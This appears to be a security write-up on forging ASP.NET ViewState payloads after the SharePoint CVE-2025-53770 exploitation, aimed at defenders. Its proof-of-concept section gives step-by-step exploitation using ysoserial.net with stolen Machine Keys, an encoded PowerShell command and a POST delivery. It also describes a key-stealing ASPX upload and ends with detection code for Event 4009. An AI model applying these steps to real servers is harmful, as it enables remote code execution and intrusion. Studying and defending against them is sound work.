ViewState — CVE-2025-53770

.NET ViewState

Approximately 10 days after SharePoint deserialization vulnerabilities (CVE-2025-53770/53771) were exploited, attackers began distributing ASPX shells designed to extract IIS/ASP.NET Machine Keys that protect VIEWSTATE and cookies. With access to a Machine Key—obtained from web.config or registry via uploaded ASPX—attackers can forge legitimate VIEWSTATE payloads using tools like ysoserial.net to achieve Remote Code Execution across applications. Windows does not automatically rotate autogenerated Machine Keys, requiring manual regeneration after any code execution incident. Defenders should monitor Windows Application Event ID 4009 (VIEWSTATE verification failures) to detect exploitation attempts.

Requirements

  • VIEWSTATE deserialization with LosFormatter enabled
  • MachineKey (validation key and optional decryption key)
  • Validation algorithm (e.g., HMACSHA256 / SHA1)
  • Application path / appDomain (used when crafting VIEWSTATE)
  • Ability to deliver a crafted VIEWSTATE to the application (e.g., via HTTP POST)
  • A way to obtain the MachineKey, e.g., LFI/XXE against web.config or an uploaded ASPX that reads the registry

POC || GTFO

Preface

The demonstration uses findMachineKey.aspx, uploaded to the target ASP.NET webserver, which reads the Machine Keys from the registry and from web.config; it stands in for the LFI and/or RCE scenarios in which an attacker would obtain those keys.

NOTE: The findMachineKey.aspx file is flagged as an exploit and removed by Windows Threat Protection.

A simple web form accepting POST requests echoes user input and serves as the delivery mechanism for malicious VIEWSTATE payloads.

Exploit Steps

1. Download and Generate Payload

Download ysoserial.net, then base64-encode the command to be executed (UTF-16LE, the encoding that powershell -e expects):

```powershell
# UTF-16LE bytes, base64-encoded, as required by powershell -EncodedCommand (-e)
[Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes('whoami > C:\Windows\Temp\a.txt'))
```

2. Generate Malicious VIEWSTATE

Use ysoserial.net with the obtained Machine Key, validation algorithm, and application path:

```powershell
$ysoArgs = @(
  '-p','ViewState',                            # ViewState plugin
  '-g','TextFormattingRunProperties',          # gadget chain
  '-c','"powershell -e dwBo[truncated]HQA"',   # command to run: the base64 blob from step 1
  '--path','/default.aspx',                    # request path, used to derive __VIEWSTATEGENERATOR
  '--apppath','/',                             # application path
  '--validationalg','HMACSHA256',              # algorithm and key taken from the extracted MachineKey
  '--validationkey','B298[truncated]173D',
  '--islegacy',
  '--isdebug'
)

.\ysonet.exe @ysoArgs
```

Output includes the calculated __VIEWSTATEGENERATOR and encoded payload.

3. Send POST Request

Submit the malicious VIEWSTATE payload to the target application. A 500 Internal Server Error response indicates successful exploitation.

4. Verify Execution

Confirm command execution by checking for the created file: C:\Windows\Temp\a.txt
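The Event 4009 monitoring recommended at the top of the page, as an added defender-side example (not code from the original page or from ysoserial.net): it parses Windows Application log records for ASP.NET event code 4009 and flags any client address that fails VIEWSTATE MAC validation repeatedly within a short window; the log records are constructed samples whose message layout only approximates the real health-monitoring event body.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

def _ev(time, client, path, code=4009, msg="Viewstate verification failed."):
    """Build one constructed Application-log record (sample data, not real telemetry)."""
    return {"time": time, "code": code,
            "message": "Event message: %s\nRequest path: %s\nUser host address: %s"
                       % (msg, path, client)}

# Constructed sample: one client repeatedly fails MAC validation, one does not.
SAMPLE_EVENTS = [
    _ev("2025-07-20T10:00:01", "203.0.113.7", "/default.aspx"),
    _ev("2025-07-20T10:00:15", "203.0.113.7", "/default.aspx"),
    _ev("2025-07-20T10:01:40", "203.0.113.7", "/login.aspx"),
    _ev("2025-07-20T10:02:00", "198.51.100.9", "/default.aspx"),
    _ev("2025-07-20T10:02:30", "203.0.113.7", "/default.aspx", code=1309,
        msg="An unhandled exception has occurred."),
    _ev("2025-07-20T10:03:02", "203.0.113.7", "/default.aspx"),
]

PATH_RE = re.compile(r"^Request path: (\S+)", re.M)
CLIENT_RE = re.compile(r"^User host address: (\S+)", re.M)

def parse_4009(event):
    """Return (client, request path) for an Event 4009 record, else None."""
    if event["code"] != 4009:
        return None
    client, path = CLIENT_RE.search(event["message"]), PATH_RE.search(event["message"])
    return (client.group(1) if client else "?", path.group(1) if path else "?")

def viewstate_failure_bursts(events, threshold=3, window_minutes=5):
    """Flag clients with >= threshold ViewState MAC failures inside a sliding window."""
    per_client = defaultdict(list)
    for ev in events:
        parsed = parse_4009(ev)
        if parsed:
            per_client[parsed[0]].append((datetime.fromisoformat(ev["time"]), parsed[1]))
    window, alerts = timedelta(minutes=window_minutes), []
    for client, hits in per_client.items():
        hits.sort()
        for i, (t0, _) in enumerate(hits):
            in_window = [h for h in hits[i:] if h[0] - t0 <= window]
            if len(in_window) >= threshold:
                alerts.append({"client": client, "count": len(in_window),
                               "paths": sorted({h[1] for h in in_window})})
                break  # one alert per client is enough
    return alerts
```

A payload signed with the genuine validationKey passes integrity checking and writes no 4009 event, so this catches attempts made with a wrong or stale key rather than a correctly forged one; regenerating the keys after an incident remains the control that closes the path.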
